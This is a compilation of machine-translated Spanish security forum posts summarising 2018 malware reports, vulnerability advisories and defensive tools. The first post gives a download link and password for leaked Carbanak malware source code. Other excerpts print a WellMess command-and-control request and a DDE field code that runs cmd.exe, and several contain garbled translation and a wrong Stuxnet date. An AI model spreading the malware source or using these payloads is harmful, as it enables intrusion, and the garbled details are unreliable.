Temas

Info:
https://en.wikipedia.org/wiki/Carbanak
https://latam.kaspersky.com/resource-center/threats/carbanak-apt

Link: https://s3-eu-west-1.amazonaws.com/malware-research.org/blogposts/carbanak_leak/carbanak_source_code_leak_maybe.zip
Pass: f1Up$zD%QY*p5@!&

Saludos.

La botnet Hide 'N Seek de Internet of Things (IoT) recientemente ha agregado soporte para más dispositivos y también puede infectar los servidores de bases de datos OrientDB y CouchDB, dicen los investigadores de NetLab de Qihoo 360.

Cuando se detallaron por primera vez en enero de este año, la botnet estaba evolucionando y extendiéndose rápidamente, atrapando a decenas de miles de dispositivos en cuestión de días. Dirigido a numerosas vulnerabilidades, el malware era capaz de exfiltración de datos, ejecución de código e interferencia con el funcionamiento del dispositivo.

A principios de mayo, el malware infectó más de 90,000 dispositivos, agregó código para atacar más vulnerabilidades y también adoptó la persistencia, pudiendo sobrevivir al reinicio. El módulo de persistencia, sin embargo, solo se activaría si la infección se realizó a través del servicio Telnet.

Una red zombi de igual a igual (P2P), Hide 'N Seek ha seguido evolucionando, y actualmente está apuntando a aún más vulnerabilidades que antes. El botnet ahora también incluye exploits para dispositivos AVTECH (cámara web) y enrutadores Cisco Linksys, revela NetLab de Qihoo 360.

Además, el malware ahora incluye 171 direcciones de nodo P2P codificadas, ha agregado un programa de minería criptodinámica a su código, y también se ha convertido en una amenaza multiplataforma, con la adición de soporte para los servidores de bases de datos OrientDB y CouchDB.

El mecanismo de propagación de la botnet incluye un escáner tomado de Mirai, dirigido al puerto TCP fijo 80/8080/2480/5984/23 y otros puertos aleatorios.

Para la infección, el malware intenta la ejecución remota de código utilizando explotaciones dirigidas a enrutadores TPLink, enrutadores Netgear (también segmentados por Reaper botnet y la variante Mirai Wicked), cámaras AVTECH, enrutadores Cisco Linksys, JAW / 1.0, OrientDB y Apache CouchDB.

Más información: https://www.securityweek.com/hide-n-seek-iot-botnet-can-infect-database-servers

Saludos.

Este ransomware acaba de agregar nuevos trucos para propagarse más rápido e infectar PC con Windows XP.

Un cambio en el mecanismo de cifrado y la capacidad de atacar máquinas con Windows XP a través de una vulnerabilidad SMB mejora la capacidad de proliferación de GandCrab.

Una de las formas más activas de ransomware se ha actualizado con un nuevo medio de cifrado de datos como la pandilla detrás del aspecto del malware para garantizar que siga siendo lo más dañino posible.

GandCrab ransomware apareció por primera vez en enero de este año y rápidamente se convirtió en una de las formas más populares del malware de bloqueo de archivos. Se vende a bajo precio en la web oscura como 'malware como servicio' y regularmente recibe actualizaciones de sus desarrolladores.

Ahora se ha lanzado la última versión del ransomware y contiene lo que los investigadores de Fortinet describen como "una revisión en términos de la estructura del código", y algunos trucos nuevos bajo la manga.

Uno de los mayores cambios en la versión 4 de GandCrab es que el mecanismo de cifrado pasó del RSA-2048 a un cifrado de flujo Salsa20 mucho más rápido, permitiendo que los archivos se cifren más rápidamente que antes. El mecanismo Salsa20 ya había sido implementado por Petya ransomware.

Esta versión de GandCrab se sirve a las víctimas a través de sitios web comprometidos de WordPress que alientan a los usuarios a descargar herramientas del sistema a través de enlaces que resultan en la descarga del malware. Los investigadores dicen que el malware ejecutable y los enlaces de descarga se actualizan regularmente. Sin embargo, no determinan cómo se distribuirá una vez más mediante correos electrónicos de phishing en algún momento en el futuro.

Más información: https://www.zdnet.com/article/this-ransomware-just-added-new-tricks-to-spread-faster-and-infect-windows-xp-pcs/

Saludos.

Descubierto por Aleksandar Nikolic de Cisco Talos
Visión de conjunto
Hoy, Talos está publicando detalles de nuevas vulnerabilidades dentro de Adobe Acrobat Reader DC. Adobe Acrobat Reader es el lector de PDF más popular y rico en características. Tiene una gran base de usuarios, generalmente es un lector de PDF predeterminado en los sistemas y se integra en los navegadores web como un complemento para la renderización de archivos PDF. Como tal, engañar a un usuario para visitar una página web maliciosa o enviar un archivo adjunto de correo electrónico especialmente diseñado puede ser suficiente para desencadenar estas vulnerabilidades.

TALOS-2018-0569 - Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability (CVE-2018-12812)

Un código javascript específico incrustado en un archivo PDF puede provocar confusión en el tipo de objeto al abrir un documento PDF en Adobe Acrobat Reader DC 2018.011.20038. Con una cuidadosa manipulación de la memoria, esto puede llevar a la ejecución de código arbitrario. Para activar esta vulnerabilidad, la víctima debería abrir el archivo malicioso o acceder a una página web maliciosa. La información detallada de vulnerabilidad se puede encontrar aquí.

https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0569

Más información: https://blog.talosintelligence.com/2018/07/vuln-spotlight-adobe-reader.html?utm_source=dlvr.it&utm_medium=twitter&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29

Saludos.

Microsoft lanza actualizaciones de parches para 53 vulnerabilidades en su software.

Es hora de adaptar sus sistemas y software para las últimas actualizaciones de parches de seguridad de julio de 2018.
Microsoft lanzó hoy actualizaciones de parches de seguridad para 53 vulnerabilidades, que afectan a Windows, Internet Explorer (IE), Edge, ChakraCore, .NET Framework, ASP.NET, PowerShell, Visual Studio y Microsoft Office y Office Services, y Adobe Flash Player.
De las 53 vulnerabilidades, 17 se clasifican como críticas, 34 importantes, una moderada y una de baja gravedad.
Este mes no hay una vulnerabilidad crítica parchada en el sistema operativo Microsoft Windows y, sorprendentemente, ninguno de los defectos reparados por el gigante tecnológico este mes aparece como públicamente conocido o bajo ataque activo.
Errores críticos parcheados en los productos de Microsoft
La mayoría de los problemas críticos son fallas de corrupción de memoria en IE, navegador Edge y motor de scripts Chakra, que si se explota con éxito, podría permitir a un atacante remoto no autenticado ejecutar código arbitrario en un sistema específico en el contexto del usuario actual.
"Si el usuario actual inicia sesión con derechos administrativos de usuario, un atacante que explotara con éxito la vulnerabilidad podría tomar el control de un sistema afectado. Un atacante podría entonces instalar programas, ver, cambiar o eliminar datos, o crear cuentas nuevas con usuario completo. derechos ", explica Microsoft.
Uno de estos defectos críticos (CVE-2018-8327), informado por los investigadores de Casaba Security, también afecta a los Servicios Editor de PowerShell que podrían permitir a un atacante remoto ejecutar código malicioso en un sistema vulnerable.
A continuación, puede encontrar una breve lista de todas las vulnerabilidades críticas que Microsoft ha parcheado este mes en sus diversos productos:

Scripting Engine Memory Corruption Vulnerability (CVE-2018-8242)
Edge Memory Corruption Vulnerability (CVE-2018-8262)
Edge Memory Corruption Vulnerability (CVE-2018-8274)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8275)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8279)
Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8280)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8283)
Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8286)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8288)
Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8290)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8291)
Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8294)
Scripting Engine Memory Corruption Vulnerability (CVE-2018-8296)
Chakra Scripting Engine Memory Corruption Vulnerability (CVE-2018-8298)
Microsoft Edge Memory Corruption Vulnerability (CVE-2018-8301)
Microsoft Edge Information Disclosure Vulnerability (CVE-2018-8324)
PowerShell Editor Services Remote Code Execution Vulnerability (CVE-2018-8327)

Más información: https://thehackernews.com/2018/07/microsoft-security-patch-update.html?utm_source=dlvr.it&utm_medium=twitter

Saludos.

Resumen
Facebook Messenger para Android se puede bloquear a través de la verificación de estado de la aplicación. Esto puede ser explotado por un atacante de MITM interceptando esa llamada y devolviendo una gran cantidad de datos. Esto sucede porque esta comprobación de estado no se realiza a través de SSL y la aplicación no contiene lógica para verificar si los datos devueltos son muy grandes.

El vendedor no tiene planes inmediatos para solucionar este problema.

Detalles de vulnerabilidad
Facebook Messenger para Android es una aplicación de mensajería proporcionada por Facebook. Al monitorear el tráfico de red de un dispositivo de prueba que ejecuta Android, observamos que la aplicación realiza llamadas de red para verificar el estado del servidor. Esta llamada se realizó a través de HTTP sin el uso de SSL / TLS. URL de ejemplo:

http://portal.fb.com/mobile/status.php
Tuvimos éxito al bloquear la aplicación al inyectar un paquete grande porque la aplicación no maneja datos grandes que regresan correctamente y no usa SSL para esta llamada.

También es importante tener en cuenta que esto le permitiría a alguien bloquear el uso de Messenger pero sin que los usuarios se den cuenta de que están siendo bloqueados, ya que atribuirán la falla de la aplicación a un error en lugar de a un bloqueo.

Más información:
http://seclists.org/fulldisclosure/2018/Jul/37?utm_source=feedburner&utm_medium=twitter&utm_campaign=Feed%3A+seclists%2FFullDisclosure+%28Full+Disclosure%29
https://wwws.nightwatchcybersecurity.com/2018/07/09/advisory-crashing-facebook-messenger-for-android-with-an-mitm-attack/

Saludos.

¡Ejecutar la trampa! Cómo configurar tu propio Honeypot para recolectar muestras de malware

Introducción
Este documento es cómo configurar su propio Honeypot (dionaea). Diría que a la mayoría de nosotros nos gustan los binarios de ingeniería inversa. Muchos de nosotros tenemos una fascinación con el malware. ¿Por qué no combinarlos y RE con algunos Malware que están siendo usados ​​activamente para la explotación?

Mi tutorial es cómo configurar un honeypot en Amazon Web Services (AWS). Si no está familiarizado con AWS, tldr; ellos tienen servidores, puedes usarlos. ProTip: si tiene 1 microinstancia con un disco duro adjunto de menos de 50 GB, puede tener un servidor gratuito. Tendrá que proporcionar la información de su tarjeta de crédito a AWS, pero se le permite un servidor gratuito para siempre, siempre y cuando permanezca en el "nivel libre". Ahora puede aumentar n-número de micro-instancias, pero solo obtiene lo que equivale a 1 mes de cantidad de horas, cada mes. Entonces, si activas 2 instancias micro, a mitad de camino del dinero, comenzarás a facturar hasta fin de mes. Así que ten cuidado.

Nivel de autor: Skiddo
Habilidades requeridas
Comandos generales de Linux
Comprensión general de las redes
Requisitos
Servidor (AWS funciona bien. Gratis con CC proporcionado)
Descargo de responsabilidad (opcional)
A algunos proveedores de hosting no les gusta el malware.
Así que, quizás, no recopilen en sus servidores si no son geniales como usted.

(Separe este encabezado del papel usando una regla horizontal)

Paper:
Configuración de AWS
Comenzaré ahora a configurar su instancia de AWS.
[Si no está utilizando AWS, salte a la próxima sección.]

Continúe haciendo clic en EC2 y Crear una nueva instancia. (EC2 == Servidores AWS). Después de eso, desea seleccionar Ubuntu Server 14.04 LTS



Luego, selecciona el tipo de micro-instancia:



Genial, ahora para configurar detalles de instancia, seleccione "Asignar automáticamente IP pública" y configúrelo como "Habilitar". (No te preocupes por mi rol de IAM)



Más información: https://0x00sec.org/t/run-the-trap-how-to-setup-your-own-honeypot-to-collect-malware-samples/7445

Saludos.

https://app.any.run/tasks/ad02108c-1f77-423f-9baf-96445260f589

Saludos.

Algunos programas maliciosos están diseñados para ejecutarse en múltiples plataformas y, por lo general, están escritos en Java. Por ejemplo, Adwind malware (introducido en un artículo anterior) está escrito en Java y se ejecuta en Windows y otros sistemas operativos. Golang es otro lenguaje de programación, y se usa para el controlador Mirai, que infecta los sistemas Linux.

Este artículo presenta el comportamiento del malware WellMess basado en nuestra observación. Es un tipo de malware programado en Golang y compilado de forma cruzada para que sea compatible tanto con Linux como con Windows. Para obtener más detalles sobre la función de malware, consulte también el informe de LAC [1].

Comportamiento de WellMess
Generalmente, los archivos ejecutables de Golang incluyen muchas bibliotecas requeridas en sí mismas. Esto generalmente aumenta el tamaño del archivo, lo que hace que WellMess sea más grande que 3 MB. Otra característica es que los nombres de funciones para los archivos ejecutables se pueden encontrar en el archivo mismo. (Incluso para los archivos eliminados, los nombres de las funciones se pueden recuperar utilizando herramientas como GoUtils2.0 [2]). A continuación se muestran los nombres de funciones utilizados en WellMess:

Código [Seleccionar] Expandir

_/home/ubuntu/GoProject/src/bot/botlib.EncryptText
_/home/ubuntu/GoProject/src/bot/botlib.encrypt
_/home/ubuntu/GoProject/src/bot/botlib.Command
_/home/ubuntu/GoProject/src/bot/botlib.reply
_/home/ubuntu/GoProject/src/bot/botlib.Service
_/home/ubuntu/GoProject/src/bot/botlib.saveFile
_/home/ubuntu/GoProject/src/bot/botlib.UDFile
_/home/ubuntu/GoProject/src/bot/botlib.Download
_/home/ubuntu/GoProject/src/bot/botlib.Send
_/home/ubuntu/GoProject/src/bot/botlib.Work
_/home/ubuntu/GoProject/src/bot/botlib.chunksM
_/home/ubuntu/GoProject/src/bot/botlib.Join
_/home/ubuntu/GoProject/src/bot/botlib.wellMess
_/home/ubuntu/GoProject/src/bot/botlib.RandStringBytes
_/home/ubuntu/GoProject/src/bot/botlib.GetRandomBytes
_/home/ubuntu/GoProject/src/bot/botlib.Key
_/home/ubuntu/GoProject/src/bot/botlib.GenerateSymmKey
_/home/ubuntu/GoProject/src/bot/botlib.CalculateMD5Hash
_/home/ubuntu/GoProject/src/bot/botlib.Parse
_/home/ubuntu/GoProject/src/bot/botlib.Pack
_/home/ubuntu/GoProject/src/bot/botlib.Unpack
_/home/ubuntu/GoProject/src/bot/botlib.UnpackB
_/home/ubuntu/GoProject/src/bot/botlib.FromNormalToBase64
_/home/ubuntu/GoProject/src/bot/botlib.RandInt
_/home/ubuntu/GoProject/src/bot/botlib.Base64ToNormal
_/home/ubuntu/GoProject/src/bot/botlib.KeySizeError.Error
_/home/ubuntu/GoProject/src/bot/botlib.New
_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).BlockSize
_/home/ubuntu/GoProject/src/bot/botlib.convertFromString
_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).Encrypt
_/home/ubuntu/GoProject/src/bot/botlib.(*rc6cipher).Decrypt
_/home/ubuntu/GoProject/src/bot/botlib.Split
_/home/ubuntu/GoProject/src/bot/botlib.Cipher
_/home/ubuntu/GoProject/src/bot/botlib.Decipher
_/home/ubuntu/GoProject/src/bot/botlib.Pad
_/home/ubuntu/GoProject/src/bot/botlib.AES_Encrypt
_/home/ubuntu/GoProject/src/bot/botlib.AES_Decrypt
_/home/ubuntu/GoProject/src/bot/botlib.generateRandomString
_/home/ubuntu/GoProject/src/bot/botlib.deleteFile
_/home/ubuntu/GoProject/src/bot/botlib.Post
_/home/ubuntu/GoProject/src/bot/botlib.SendMessage
_/home/ubuntu/GoProject/src/bot/botlib.ReceiveMessage
_/home/ubuntu/GoProject/src/bot/botlib.Send.func1
_/home/ubuntu/GoProject/src/bot/botlib.init
_/home/ubuntu/GoProject/src/bot/botlib.(*KeySizeError).Error

Como se mencionó anteriormente, WellMess tiene una versión que se ejecuta en Windows (PE) y otra en Linux (ELF). Aunque hay algunas diferencias menores, ambas tienen la misma funcionalidad.

El malware se comunica con un servidor C & C utilizando solicitudes HTTP y realiza funciones basadas en los comandos recibidos. A continuación se muestra un ejemplo de la comunicación: (el valor de User-Agent varía por muestra).

Código [Seleccionar] Expandir

POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20130401 Firefox/31.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Language: en-US,en;q=0.8
Cookie: c22UekXD=J41lrM+S01+KX29R+As21Sur+%3asRnW+3Eo+nIHjv+o6A7qGw+XQr%3aq+PJ9jaI+KQ7G.+FT2wr+wzQ3vd+3IJXC+lays+k27xd.+di%3abd+mHMAi+mYNZv+Mrp+S%2cV21.+ESollsY+6suRD+%2cx8O1m+%3azc+GYdrw.+FbWQWr+5pO8;1rf4EnE9=+WMyn8+8ogDA+WxR5R.+sFMwDnV+DFninOi+XaP+p4iY+82U.+hZb+QB6+kMBvT9R
Host: 45.123.190.168
Content-Length: 426
Expect: 100-continue
Accept-Encoding: deflate
Connection: Keep-Alive

pgY4C8 8JHqk RjrCa R9MS 3vc4Uk KKaRxH R8vg Tfj B3P,C 0RG9lFw DqF405. i3RU1 0lW 2BqdSn K3L Y7hEc. tzto yKU8 p1,E L2kKg pQcE1. b8V6S0Y 6akx, ggMcrXk 0csao Uwxn. fYVtWD rwt:BJ 5IBn rCMxZoo OsC. :ZXg pKT Re0 cJST1 L0GsC. 9dJZON9 qs29pPB pCTR:8 0hO0FK sK13UUw. jMA hDICL hGK1 qjRj1AY YMjAIeI. g7GEZPh gW:C eNX6 ptq kevfIyP. u,96r7c D:6ZiR fCC IIi cBvq,p. Vt96aEu JFLeu 0XtFJm ee4S 7M2. Uc68sF MArC5v 96ngG 9UvQGt 5:ut. qiE0xQ

Más información: https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html

Saludos.

Introducción
Tradicionalmente, los correos electrónicos son solo ASCII y están limitados a 1000 caracteres por línea. El estándar MIME define una forma de tener un correo estructurado (varias partes, incluidos los archivos adjuntos) y para transportar datos que no sean ASCII. Desafortunadamente, el estándar es innecesariamente complejo y flexible, hace que las definiciones contradictorias sean posibles y no define el manejo real de errores.

El resultado de esto es que las diferentes implementaciones interpretan casos extremos de MIME válido o MIME inválido a propósito de diferentes maneras. Esto incluye la interpretación en sistemas de análisis como filtros de correo, IDS / IPS, gateways de correo o antivirus, que a menudo interpretan los correos preparados específicamente de forma diferente al sistema del usuario final.

Esta publicación muestra lo fácil que es modificar un correo con un archivo adjunto malicioso en unos simples pasos, para que al final ningún antivirus de Virustotal pueda extraer correctamente el archivo adjunto del correo y detectar el malware. Después de toda esta modificación, aún es posible abrir el correo en Thunderbird y acceder a la carga maliciosa sin problemas.

Nada de esto es en realidad realmente nuevo. Publiqué problemas similares antes en 11/2014 y varias publicaciones en 07/2015 y también mostré cómo se puede utilizar para eludir el control adecuado de las firmas DKIM. Y también hay investigaciones mucho más antiguas como esta desde 2008.

Sin embargo, los sistemas de análisis todavía están rotos y los proveedores o bien no están al tanto de estos problemas o no hablan de estos problemas. Por lo tanto, podría ser útil volver a mostrar cuán trivial puede hacerse ese desvío de análisis, con la esperanza de que al menos algunos proveedores despierten y arreglen sus productos. A continuación, se muestra cómo ocultar un archivo adjunto malicioso del análisis adecuado en unos pocos pasos simples y fáciles de seguir.

Paso 1: MIME normal
Comenzamos con un correo que contiene el inocente virus de prueba EICAR dentro de un archivo ZIP. El correo consta de dos partes MIME, la primera es un texto y la segunda el archivo adjunto, codificado con Base64 para traducir el archivo adjunto binario en ASCII para el transporte. A partir de hoy (2018/07/05) 36 (de 59) productos en Virustotal son capaces de detectar la carga maliciosa. El resto probablemente no pueda o no esté configurado para tratar con archivos de correo electrónico o malware en archivos ZIP.

Más información: https://noxxi.de/research/mime-5-easy-steps-to-bypass-av.html

Saludos.

LogonTracer es una herramienta para investigar inicios de sesión maliciosos al visualizar y analizar los registros de eventos de Windows Active Directory. El análisis del registro de eventos es un elemento clave en DFIR. En la fase de movimiento lateral de los incidentes de APT, el análisis de los registros de eventos de Windows Active Directory es crucial, ya que es una de las pocas formas de identificar los hosts comprometidos. Al mismo tiempo, examinar los registros suele ser una tarea dolorosa porque Windows Event Viewer no es una mejor herramienta. Los analistas a menudo terminan exportando registros completos en formato de texto, y luego los alimentan a otras herramientas como SIEM. Sin embargo, SIEM no es una solución perfecta para manejar la creciente cantidad de registros.

Nos gustaría presentar una herramienta de análisis de registro de eventos más especializada para los respondedores de incidentes. Visualiza registros de eventos utilizando análisis de red y aprendizaje automático para mostrar la correlación de cuentas y hosts. Demostrado con nuestra experiencia de respuesta sobre el terreno, lo más importante es que es una herramienta de código abierto.

Link: https://github.com/JPCERTCC/LogonTracer

Saludos.

Apple lanza iOS 11.4.1 y bloquea las herramientas de descifrado de códigos de acceso utilizadas por la policía

Apple lanzó hoy iOS 11.4.1, y aunque la mayoría de nosotros ya estamos mirando hacia adelante para ver todo lo nuevo que viene en iOS 12, esta pequeña actualización contiene una nueva e importante característica de seguridad: Modo Restringido USB. Apple ha agregado protecciones contra los dispositivos USB que usan las fuerzas del orden público y las compañías privadas que se conectan con Lightning para descifrar el código de acceso de un iPhone y evadir las protecciones de cifrado habituales de Apple.

Si va a Configuración y marca debajo de ID de rostro (o ID táctil) y Código de acceso, verá una nueva alternancia para Accesorios USB. Por defecto, el interruptor está apagado. Esto significa que una vez que su iPhone o iPad se ha bloqueado durante más de una hora seguidas, iOS ya no permitirá que los accesorios USB se conecten al dispositivo, lo que desactivará las herramientas de craqueo como GrayKey. Si tiene accesorios que desea seguir trabajando después de que su iPhone haya estado bloqueado por un tiempo, puede alternar la opción para eliminar el límite de horas.



Más información: https://www.theverge.com/2018/7/9/17549538/apple-ios-11-4-1-blocks-police-passcode-cracking-tools?utm_campaign=theverge&utm_content=chorus&utm_medium=social&utm_source=twitter

Saludos.

Repasando mi honeypot de WebLogic, estoy acostumbrado a ver muchos cripto mineros. El honeypot es vulnerable a CVE-2017-10271. He escrito antes sobre los varios criptomeros. [referencia al diario anterior]

Pero este fin de semana, finalmente descubrí algo un poco diferente. El atacante instaló una puerta trasera que hasta ahora no ha sido reconocida por ninguna herramienta antivirus de acuerdo con Virustotal [insertar enlace a resultado].

Este binario establece una conexión con el atacante para el control remoto protegido por una contraseña predeterminada trivial. Nota para el atacante: si la contraseña es "reemplazar con su contraseña"; ¡hazlo!"

Veamos algunos detalles sobre este caso.

Explotación de WebLogic

El archivo malicioso se cargó y ejecutó a través de una conocida vulnerabilidad de WebLogic. Hablamos sobre esta vulnerabilidad y los exploits relacionados a principios de este año [1]. Los atacantes descargaron la muestra usando 'wget', como se ve en la Figura 1.



Sin embargo, otro cripto minero?

La mayoría de las explotaciones similares dieron como resultado una actividad de cripto minería. Pero esto no fue así. Sin dirección de billetera, sin archivo de configuración, sin conexión de grupo de minería de datos criptográficos y sin consumo de CPU. En cambio, el malware estableció una conexión con un servidor de comando y control (C & C) para enviar la información de la víctima y recuperar las órdenes del atacante.

La Figura 2 muestra que esta muestra actualmente no está reconocida por ninguna de las herramientas antimalware cubiertas por Virustotal.



Más información: https://isc.sans.edu/diary/23850

Saludos.

Este breve video muestra cómo puede buscar archivos PCAP con expresiones regulares (expresiones regulares) usando CapLoader y cómo esto se puede aprovechar para mejorar las firmas de IDS.

https://www.netresec.com/videos/CapLoader-regex-pony_1152x864.webm

Más información: https://www.netresec.com/?month=2018-07&page=Blog&post=Detecting-the-Pony-Trojan-with-RegEx-using-CapLoader

Saludos.

Guasap Forensic, una herramienta desarrollada en Python para realizar análisis forense a #WhatsApp.

Guasap Forensic
El Guasap Forensic implementado en Python bajo la Licencia Pública General de GNU, para la extracción y análisis de archivos, bases de datos y registros de WhatsApp forense.

¿Que hace?
Verificar la raíz en el dispositivo
Extraer base de datos y archivos multimedia (sin raíz)
Extrae y analiza (mensajes eliminados y otros) DB y registros (solo raíz)

¿Cómo utilizar?
$ python Guasap_Forensic.py



Link: https://github.com/Quantika14/guasap-whatsapp-foresincs-tool

Saludos.

Ocultar código malicioso dentro de una macro es una técnica maliciosa muy conocida entre los atacantes y defensores, e incluso los usuarios finales han escuchado el mensaje de que deben tener cuidado al abrir documentos de fuentes desconocidas que contienen macros. Muchas empresas implementan una política de bloqueo para macros o eliminan el código VBA que se encuentra en los archivos adjuntos de correo electrónico. Lo que se sabe menos, sin embargo, es que los atacantes pueden insertar código sin la necesidad de utilizar una macro. En tales casos, un documento malicioso podría pasar por alto las defensas tradicionales.

¿QUÉ ES LA EXPLOTACIÓN DDE?
El intercambio de datos dinámicos (DDE) de Microsoft es un protocolo diseñado para permitir el transporte de datos entre las aplicaciones de MS Office. Se introdujo ya en Windows 2.0 en 1987 y proporciona lo que Microsoft alguna vez consideró como funcionalidad central para el conjunto de herramientas de Office:

"Windows proporciona varios métodos para transferir datos entre aplicaciones. Un método es usar el protocolo de intercambio dinámico de datos (DDE). El protocolo DDE es un conjunto de mensajes y pautas. Envía mensajes entre aplicaciones que comparten datos y usa memoria compartida para intercambiar datos entre aplicaciones. Las aplicaciones pueden usar el protocolo DDE para transferencias de datos únicas y para intercambios continuos en los que las aplicaciones se envían actualizaciones entre sí a medida que se dispone de nuevos datos ".

Si bien eso es sin duda un beneficio para los usuarios legítimos y los usos del protocolo, el desafortunado efecto secundario de DDE es que proporciona una vía para que los atacantes exploten. DDE permite la ejecución del código incrustado una vez que la víctima abre dicho archivo, sin la solicitud de autorización asociada con las macros. Aunque DDE ahora ha sido reemplazado por el kit de herramientas de vinculación e incrustación de objetos (OLE), las aplicaciones de Office aún soportan DDE por compatibilidad con versiones anteriores.

¿Qué tan fácil es usar Microsoft Office DDE para activar el código?
Como lo muestran Etienne Stalmans y Saif El-Sherei, es extremadamente fácil. Aquí hay una demostración simple que incorpora un documento de MS Word con código DDE:

Insertar pestaña -> Piezas rápidas -> Campo
En la ventana emergente, asegúrese de que esté seleccionado "= (Fórmula)" y haga clic en "Aceptar".
El Código de campo debería mostrarse ahora; cámbielo para que contenga lo siguiente:
{DDEAUTO c: \\ windows \\ system32 \\ cmd.exe "/ k calc.exe"}
Guarde el documento.
Una vez que se abre el documento, el código ejecuta inmediatamente calc.exe.



Más información: https://www.sentinelone.com/blog/malware-embedded-microsoft-office-documents-dde-exploit-macroless/

Saludos.

El bug bounty esta más presente de lo que pensamos y, poco a poco, se va a ir haciendo más popular, sobre todo si trabajas en Seguridad Informática. De hecho, lo hemos mencionado previamente en la newsletter quincenal CyberSecurity Pulse y en algún post como este.

Nuestra pregunta es bien sencilla, ¿qué es el bug bounty? Para poder definir este concepto, vamos a partir de la explicación de algunos otros conceptos o definiciones básicas.

Un bróker (del inglés broker) es un individuo o institución (agente de bolsa) que organiza las transacciones entre un comprador y un vendedor para ganar una comisión cuando se ejecute la operación. Hay muchos tipos de brokers: de seguros, tecnología, etc. y en el caso de bug bounty, podemos decir que utilizamos el mismo concepto, es un intermediador entre proveedores (en este caso Hackers) y clientes (las empresas).

El crowdsourcing (del inglés crowd – multitud – y outsourcing – recursos externos) se podría traducir al español como colaboración abierta de tareas, es decir, que las tareas se realicen mediante comentarios de un grupo de personas o comunidad, a través de una convocatoria abierta. Ejemplos de este concepto, son Facebook, empresa que genera mas contenido sin tener escritores, UBER, empresa de viajes que ningún auto es propiedad de ellos, AirBNB, etc.

Más información: http://blog.elevenpaths.com/2018/07/bug-bounty-ciberseguridad.html

Saludos.

HNS está en IoT botnet (Hide and Seek) descubierto originalmente por BitDefender en enero de este año. En ese informe, los investigadores señalaron que HNS utilizó CVE-2016-10401 y otras vulnerabilidades para propagar código malicioso y robó información del usuario. El HNS se comunica a través del mecanismo P2P, que es el segundo botnet IoT que sabemos que utiliza la comunicación P2P después de Hajime.

Las botnets similares a P2P son difíciles de eliminar, y el botnet HNS se ha actualizado continuamente en los últimos meses, algunas actualizaciones importantes que vemos son:

Exploits adicionales para dispositivos AVTECH (cámara web, cámara web), enrutador CISCO Linksys, servidor web JAWS / 1.0, Apache CouchDB, OrientDB; con los dos dispositivos mencionados en el informe original, HNS actualmente admite 7 métodos de explotación, todos juntos
Las direcciones de nodo P2P codificadas se han aumentado a 171;
Además, observamos que el botnet HNS agrega un programa de minería de cpuminer, no está funcionando correctamente.
En particular, con el soporte adicional de los servidores de bases de datos OrientDB y CouchDB, HNS ya no solo está en IoT botnet, sino también en una botnet multiplataforma.

Escaneo de red y exploits
El botnet HNS busca posibles víctimas iniciando un escaneo de red. En este escaneo, HNS toma prestado el código de mirai botnet, y comparte los mismos caracteres.

Los puertos de destino de escaneo incluyen el puerto TCP 80/8080/2480/5984/23 y otros puertos aleatorios.



Más información: https://blog.netlab.360.com/hns-botnet-recent-activities-en/amp/

Saludos.

El malware firmado digitalmente se ha vuelto más común en los últimos años para ocultar intenciones maliciosas.
Las compañías tecnológicas taiwanesas, incluido D-Link, están usando su malware y haciendo que parezcan aplicaciones legítimas.
Como usted sabe, los certificados digitales emitidos por una autoridad de certificados de confianza (CA) se utilizan para las aplicaciones informáticas de signos criptográficamente y software y confían en su ordenador para la ejecución de esos programas sin ningún mensaje de advertencia.
Sin embargo, el autor de malware y hackers que están siempre en busca de técnicas avanzadas para eludir las soluciones de seguridad Haveseen estado abusando de los certificados digitales de confianza en los últimos años.
Los hackers utilizan certificados de firma de código comprometidos asociados con los proveedores de software de confianza con el fin de firmar su código malicioso, lo que reduce la posibilidad de que el malware ser detectado en las redes empresariales específicas y dispositivos de consumo.
Los investigadores de seguridad de ESET han identificado recientemente dos familias de malware, previamente asociados con el grupo de ciberespionaje BlackTech, thathave sido firmados con certificados digitales válidos pertenecientes a D-Link redes fabricante del equipo y otra empresa de seguridad taiwanés llamado Cambio de tecnología de la información.
El primer software malicioso, conocido como Contended, es una puerta trasera controlada a distancia diseñado para robar documentos confidenciales y espiar a los usuarios.
Por lo tanto, el segundo malware es un ladrón de contraseñas relacionado diseñado para recoger contraseñas guardadas de Google Chrome, Microsoft Internet Explorer, Microsoft Outlook y Mozilla Firefox.
Los investigadores notificados, tanto D-link y cambio de tecnología de la información sobre el tema, y ​​las empresas revocados los certificados digitales en peligro el 3 de julio y 4 de julio, 2018, respectivamente.
Dado que la mayoría de software de antivirus no comprueba la validez del certificado Incluso Cuando las empresas revocar las firmas de sus certificados, los piratas informáticos BlackTech están en silencio utilizando los mismos certificados para firmar sus herramientas maliciosas.
"La capacidad de compromiso varias empresas de tecnología con sede en Taiwán y reutilizar sus certificados de firma de código en ataques futuros muestra thatthis grupo es altamente especializada y enfocada en sí región", según los investigadores.
No es la primera vez que los hackers usan certificados válidos para firmar su malware. El infame gusano Stuxnet que se dirigió a las instalaciones de procesamiento nuclear iraní en 2003 también utilizó certificados digitales.
Así, el 2017 CCleaner Hack, los piratas informáticos worin reemplazó a la de software CCleaner original con las descargas contaminadas, lo que hizo posible gracias a la actualización de software firmado digitalmente.

Más información: https://thehackernews.com/2018/07/digital-certificate-malware.html

Saludos.

Una de las medidas básicas para proteger nuestra privacidad es asegurarnos de borrar todos los rastros que generamos cuando navegamos por Internet, como las cookies, los archivos temporales y las cachés. Aunque existen muchas aplicaciones desarrolladas para este fin, en esta ocasión os vamos a hablar de PrivaZer.

